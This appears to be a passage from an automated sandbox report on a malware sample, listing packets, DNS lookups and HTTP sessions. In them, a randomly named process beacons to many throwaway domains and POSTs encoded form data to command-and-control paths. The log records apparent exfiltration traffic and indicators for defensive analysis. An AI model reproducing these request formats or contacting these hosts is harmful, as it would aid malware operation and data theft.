                                                    Sep 5, 2024 14:27:17.145172119 CEST5723080192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:18.204114914 CEST5723080192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:19.220578909 CEST5723180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:19.225928068 CEST8057231199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:19.226015091 CEST5723180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:19.228796959 CEST5723180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:19.233686924 CEST8057231199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:19.681514978 CEST8057231199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:19.681539059 CEST8057231199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:19.681552887 CEST8057231199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:19.681884050 CEST5723180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:19.684678078 CEST5723180192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:19.691042900 CEST8057231199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:33.067064047 CEST5723280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:33.071986914 CEST8057232199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:33.072057009 CEST5723280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:33.075530052 CEST5723280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:33.080703974 CEST8057232199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:33.552771091 CEST8057232199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:33.552799940 CEST8057232199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:33.552885056 CEST5723280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:33.553610086 CEST8057232199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:33.553663969 CEST5723280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:34.594352007 CEST5723280192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:35.614454985 CEST5723380192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:35.619570017 CEST8057233199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:35.625698090 CEST5723380192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:35.625698090 CEST5723380192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:35.630744934 CEST8057233199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:36.110003948 CEST8057233199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:36.110493898 CEST8057233199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:36.110507965 CEST8057233199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:36.110584974 CEST5723380192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:37.138794899 CEST5723380192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:38.158381939 CEST5723480192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:38.165132046 CEST8057234199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:38.168230057 CEST5723480192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:38.170308113 CEST5723480192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:38.175363064 CEST8057234199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:38.175405025 CEST8057234199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:38.652837992 CEST8057234199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:38.652857065 CEST8057234199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:38.652931929 CEST5723480192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:38.653163910 CEST8057234199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:38.653209925 CEST5723480192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:39.685592890 CEST5723480192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:40.705756903 CEST5723580192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:40.710612059 CEST8057235199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:40.710724115 CEST5723580192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:40.715140104 CEST5723580192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:40.719949007 CEST8057235199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:41.175417900 CEST8057235199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:41.175461054 CEST8057235199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:41.175534010 CEST8057235199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:41.175589085 CEST5723580192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:41.175628901 CEST5723580192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:41.178894043 CEST5723580192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:41.184009075 CEST8057235199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:49.237508059 CEST5723680192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:49.242480040 CEST8057236199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:49.242547035 CEST5723680192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:49.244653940 CEST5723680192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:49.249546051 CEST8057236199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:49.708673954 CEST8057236199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:49.709034920 CEST8057236199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:49.709047079 CEST8057236199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:49.709341049 CEST5723680192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:49.711714029 CEST5723680192.168.2.5199.59.243.226
                                                    Sep 5, 2024 14:27:49.716584921 CEST8057236199.59.243.226192.168.2.5
                                                    Sep 5, 2024 14:27:54.721198082 CEST5723780192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:27:54.726146936 CEST805723772.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:27:54.726232052 CEST5723780192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:27:54.728523970 CEST5723780192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:27:54.733391047 CEST805723772.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:27:55.252393961 CEST805723772.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:27:55.252464056 CEST5723780192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:27:56.232461929 CEST5723780192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:27:56.237510920 CEST805723772.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:27:57.251401901 CEST5723880192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:27:57.258594990 CEST805723872.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:27:57.258694887 CEST5723880192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:27:57.260699987 CEST5723880192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:27:57.265683889 CEST805723872.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:27:57.753067017 CEST805723872.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:27:57.753495932 CEST5723880192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:27:58.763679028 CEST5723880192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:27:58.768713951 CEST805723872.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:27:59.783195972 CEST5723980192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:27:59.788218021 CEST805723972.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:27:59.794142008 CEST5723980192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:27:59.794142008 CEST5723980192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:27:59.799346924 CEST805723972.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:27:59.799479008 CEST805723972.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:28:00.299591064 CEST805723972.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:28:00.299707890 CEST5723980192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:28:01.311580896 CEST5723980192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:28:01.316559076 CEST805723972.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:28:02.330225945 CEST5724080192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:28:02.335171938 CEST805724072.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:28:02.338592052 CEST5724080192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:28:02.342185974 CEST5724080192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:28:02.349392891 CEST805724072.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:28:02.887254953 CEST805724072.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:28:02.888048887 CEST805724072.52.178.23192.168.2.5
                                                    Sep 5, 2024 14:28:02.888098001 CEST5724080192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:28:02.894931078 CEST5724080192.168.2.572.52.178.23
                                                    Sep 5, 2024 14:28:02.899789095 CEST805724072.52.178.23192.168.2.5

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 5, 2024 14:24:28.813508034 CEST5472153192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:24:29.057430029 CEST53547211.1.1.1192.168.2.5
                                                    Sep 5, 2024 14:24:31.512013912 CEST5349299162.159.36.2192.168.2.5
                                                    Sep 5, 2024 14:24:31.999882936 CEST5939653192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:24:32.007282019 CEST53593961.1.1.1192.168.2.5
                                                    Sep 5, 2024 14:24:44.582868099 CEST6029453192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:24:44.845455885 CEST53602941.1.1.1192.168.2.5
                                                    Sep 5, 2024 14:24:58.126667023 CEST4939353192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:24:58.148190022 CEST53493931.1.1.1192.168.2.5
                                                    Sep 5, 2024 14:25:06.205084085 CEST5544553192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:25:06.524374962 CEST53554451.1.1.1192.168.2.5
                                                    Sep 5, 2024 14:25:19.673820972 CEST6001253192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:25:19.684062958 CEST53600121.1.1.1192.168.2.5
                                                    Sep 5, 2024 14:25:27.739074945 CEST5355553192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:25:28.012501955 CEST53535551.1.1.1192.168.2.5
                                                    Sep 5, 2024 14:25:41.190397024 CEST5188353192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:25:41.532886028 CEST53518831.1.1.1192.168.2.5
                                                    Sep 5, 2024 14:25:49.595990896 CEST6217553192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:25:50.043323994 CEST53621751.1.1.1192.168.2.5
                                                    Sep 5, 2024 14:26:03.814555883 CEST6335953192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:26:03.947119951 CEST53633591.1.1.1192.168.2.5
                                                    Sep 5, 2024 14:26:17.268595934 CEST5300153192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:26:17.468010902 CEST53530011.1.1.1192.168.2.5
                                                    Sep 5, 2024 14:26:30.564943075 CEST6167253192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:26:30.595567942 CEST53616721.1.1.1192.168.2.5
                                                    Sep 5, 2024 14:26:43.976064920 CEST6158053192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:26:44.015528917 CEST53615801.1.1.1192.168.2.5
                                                    Sep 5, 2024 14:26:57.299247026 CEST5659653192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:26:57.428117990 CEST53565961.1.1.1192.168.2.5
                                                    Sep 5, 2024 14:27:10.599121094 CEST5496053192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:27:11.120249987 CEST53549601.1.1.1192.168.2.5
                                                    Sep 5, 2024 14:27:24.689748049 CEST6422153192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:27:24.699783087 CEST53642211.1.1.1192.168.2.5
                                                    Sep 5, 2024 14:27:32.801379919 CEST6549153192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:27:33.063775063 CEST53654911.1.1.1192.168.2.5

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Sep 5, 2024 14:24:28.813508034 CEST192.168.2.51.1.1.10x1cd4Standard query (0)www.whiskeydecanterset.comA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:24:31.999882936 CEST192.168.2.51.1.1.10x66c5Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                    Sep 5, 2024 14:24:44.582868099 CEST192.168.2.51.1.1.10xf4faStandard query (0)www.4odagiyn.clickA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:24:58.126667023 CEST192.168.2.51.1.1.10xd098Standard query (0)www.shimakaze-83.cfdA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:25:06.205084085 CEST192.168.2.51.1.1.10x153eStandard query (0)www.marinamaquiagens.onlineA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:25:19.673820972 CEST192.168.2.51.1.1.10xb11Standard query (0)www.sandiegosharon.comA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:25:27.739074945 CEST192.168.2.51.1.1.10xda23Standard query (0)www.yi992.comA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:25:41.190397024 CEST192.168.2.51.1.1.10xbbe9Standard query (0)www.ios2222abh.topA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:25:49.595990896 CEST192.168.2.51.1.1.10xedbbStandard query (0)www.rigintech.infoA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:26:03.814555883 CEST192.168.2.51.1.1.10x935eStandard query (0)www.bnmlk.orgA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:26:17.268595934 CEST192.168.2.51.1.1.10xf323Standard query (0)www.smokesandhoney.comA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:26:30.564943075 CEST192.168.2.51.1.1.10x4900Standard query (0)www.wildenmann.shopA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:26:43.976064920 CEST192.168.2.51.1.1.10xe3c6Standard query (0)www.formytinyhome.comA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:26:57.299247026 CEST192.168.2.51.1.1.10xab1eStandard query (0)www.5a8yly.cfdA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:27:10.599121094 CEST192.168.2.51.1.1.10x6dd7Standard query (0)www.thecivilwearsprada06.siteA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:27:24.689748049 CEST192.168.2.51.1.1.10x74a8Standard query (0)www.sugargz.comA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:27:32.801379919 CEST192.168.2.51.1.1.10x9045Standard query (0)www.cacingnaga36.clickA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Sep 5, 2024 14:24:29.057430029 CEST1.1.1.1192.168.2.50x1cd4No error (0)www.whiskeydecanterset.com77980.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                    Sep 5, 2024 14:24:29.057430029 CEST1.1.1.1192.168.2.50x1cd4No error (0)77980.bodis.com199.59.243.226A (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:24:32.007282019 CEST1.1.1.1192.168.2.50x66c5Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                    Sep 5, 2024 14:24:44.845455885 CEST1.1.1.1192.168.2.50xf4faNo error (0)www.4odagiyn.click72.52.178.23A (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:24:58.148190022 CEST1.1.1.1192.168.2.50xd098Name error (3)www.shimakaze-83.cfdnonenoneA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:25:06.524374962 CEST1.1.1.1192.168.2.50x153eNo error (0)www.marinamaquiagens.online15.197.240.20A (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:25:19.684062958 CEST1.1.1.1192.168.2.50xb11Name error (3)www.sandiegosharon.comnonenoneA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:25:28.012501955 CEST1.1.1.1192.168.2.50xda23No error (0)www.yi992.com77980.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                    Sep 5, 2024 14:25:28.012501955 CEST1.1.1.1192.168.2.50xda23No error (0)77980.bodis.com199.59.243.226A (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:25:41.532886028 CEST1.1.1.1192.168.2.50xbbe9Name error (3)www.ios2222abh.topnonenoneA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:25:50.043323994 CEST1.1.1.1192.168.2.50xedbbNo error (0)www.rigintech.info162.0.213.94A (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:26:03.947119951 CEST1.1.1.1192.168.2.50x935eNo error (0)www.bnmlk.org869710.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                    Sep 5, 2024 14:26:03.947119951 CEST1.1.1.1192.168.2.50x935eNo error (0)869710.parkingcrew.net13.248.151.237A (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:26:17.468010902 CEST1.1.1.1192.168.2.50xf323No error (0)www.smokesandhoney.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                    Sep 5, 2024 14:26:17.468010902 CEST1.1.1.1192.168.2.50xf323No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                    Sep 5, 2024 14:26:17.468010902 CEST1.1.1.1192.168.2.50xf323No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:26:30.595567942 CEST1.1.1.1192.168.2.50x4900No error (0)www.wildenmann.shop91.203.110.247A (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:26:44.015528917 CEST1.1.1.1192.168.2.50xe3c6No error (0)www.formytinyhome.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                    Sep 5, 2024 14:26:44.015528917 CEST1.1.1.1192.168.2.50xe3c6No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                    Sep 5, 2024 14:26:44.015528917 CEST1.1.1.1192.168.2.50xe3c6No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:26:57.428117990 CEST1.1.1.1192.168.2.50xab1eNo error (0)www.5a8yly.cfd72.52.178.23A (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:27:11.120249987 CEST1.1.1.1192.168.2.50x6dd7No error (0)www.thecivilwearsprada06.site77980.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                    Sep 5, 2024 14:27:11.120249987 CEST1.1.1.1192.168.2.50x6dd7No error (0)77980.bodis.com199.59.243.226A (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:27:24.699783087 CEST1.1.1.1192.168.2.50x74a8Name error (3)www.sugargz.comnonenoneA (IP address)IN (0x0001)false
                                                    Sep 5, 2024 14:27:33.063775063 CEST1.1.1.1192.168.2.50x9045No error (0)www.cacingnaga36.click77980.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                    Sep 5, 2024 14:27:33.063775063 CEST1.1.1.1192.168.2.50x9045No error (0)77980.bodis.com199.59.243.226A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.whiskeydecanterset.com
                                                    • www.4odagiyn.click
                                                    • www.marinamaquiagens.online
                                                    • www.yi992.com
                                                    • www.rigintech.info
                                                    • www.bnmlk.org
                                                    • www.smokesandhoney.com
                                                    • www.wildenmann.shop
                                                    • www.formytinyhome.com
                                                    • www.5a8yly.cfd
                                                    • www.thecivilwearsprada06.site
                                                    • www.cacingnaga36.click

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.549711199.59.243.226802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:24:29.071753025 CEST457OUTGET /wuux/?sH=nVVHdDTx2PSTVJ&V6h=G8W1V2+ngxJ+E83/0IyfiXupIqoHasoRgPgAY3+/EHQIvd2Wul84Lo8VWixQDtg5AMG3Phy0eNTP33PkrrD0t0eGx0WSmGJ1HH0cwOwxD95TaQSaBMeTfZ443OH1gA0wDQ== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.whiskeydecanterset.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:24:29.528198004 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:24:28 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1522
                                                    x-request-id: c98be8c5-42d6-40b5-924f-79bfdd2130be
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_K7P5yx6HRAV+XcWEYWP6kd6LFXOozqvCLo7Kwaf3x1KcozZ2Sablk4NfjRyA4M+y5VZ6JcX1iTOKWFosnbgFag==
                                                    set-cookie: parking_session=c98be8c5-42d6-40b5-924f-79bfdd2130be; expires=Thu, 05 Sep 2024 12:39:29 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4b 37 50 35 79 78 36 48 52 41 56 2b 58 63 57 45 59 57 50 36 6b 64 36 4c 46 58 4f 6f 7a 71 76 43 4c 6f 37 4b 77 61 66 33 78 31 4b 63 6f 7a 5a 32 53 61 62 6c 6b 34 4e 66 6a 52 79 41 34 4d 2b 79 35 56 5a 36 4a 63 58 31 69 54 4f 4b 57 46 6f 73 6e 62 67 46 61 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_K7P5yx6HRAV+XcWEYWP6kd6LFXOozqvCLo7Kwaf3x1KcozZ2Sablk4NfjRyA4M+y5VZ6JcX1iTOKWFosnbgFag==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 5, 2024 14:24:29.528224945 CEST975INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzk4YmU4YzUtNDJkNi00MGI1LTkyNGYtNzliZmRkMjEzMGJlIiwicGFnZV90aW1lIjoxNzI1NTM5MD


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.55719272.52.178.23802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:24:44.953896999 CEST708OUTPOST /f1qc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.4odagiyn.click
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.4odagiyn.click
                                                    Referer: http://www.4odagiyn.click/f1qc/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 73 78 59 74 36 37 50 59 64 70 50 77 58 6a 4b 78 30 45 2b 36 51 4c 79 48 68 78 69 59 75 36 72 69 77 50 68 4a 46 6b 31 36 30 6e 50 7a 44 41 50 5a 57 34 33 31 61 42 4b 46 38 43 54 38 4f 6a 66 6a 41 4c 69 78 4d 52 38 2b 74 32 6c 63 30 4b 55 4c 56 69 30 74 4f 6e 76 31 62 75 30 41 6e 44 4d 72 55 48 72 68 63 70 64 57 33 72 50 46 42 72 36 45 63 7a 75 57 52 78 74 43 78 66 6a 61 73 46 36 6f 66 6c 73 66 7a 57 47 50 5a 6d 48 58 51 54 46 66 69 6c 79 39 6b 67 4d 44 77 66 4a 68 32 63 61 62 64 75 7a 2f 51 50 58 71 66 71 37 73 62 64 4e 71 39 73 52 6a 76 30 53 67 6d 74 49 4a 51 4d 49 38 33 66 43 50 33 4c 49 3d
                                                    Data Ascii: V6h=sxYt67PYdpPwXjKx0E+6QLyHhxiYu6riwPhJFk160nPzDAPZW431aBKF8CT8OjfjALixMR8+t2lc0KULVi0tOnv1bu0AnDMrUHrhcpdW3rPFBr6EczuWRxtCxfjasF6oflsfzWGPZmHXQTFfily9kgMDwfJh2cabduz/QPXqfq7sbdNq9sRjv0SgmtIJQMI83fCP3LI=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.55719372.52.178.23802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:24:47.504967928 CEST728OUTPOST /f1qc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.4odagiyn.click
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.4odagiyn.click
                                                    Referer: http://www.4odagiyn.click/f1qc/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
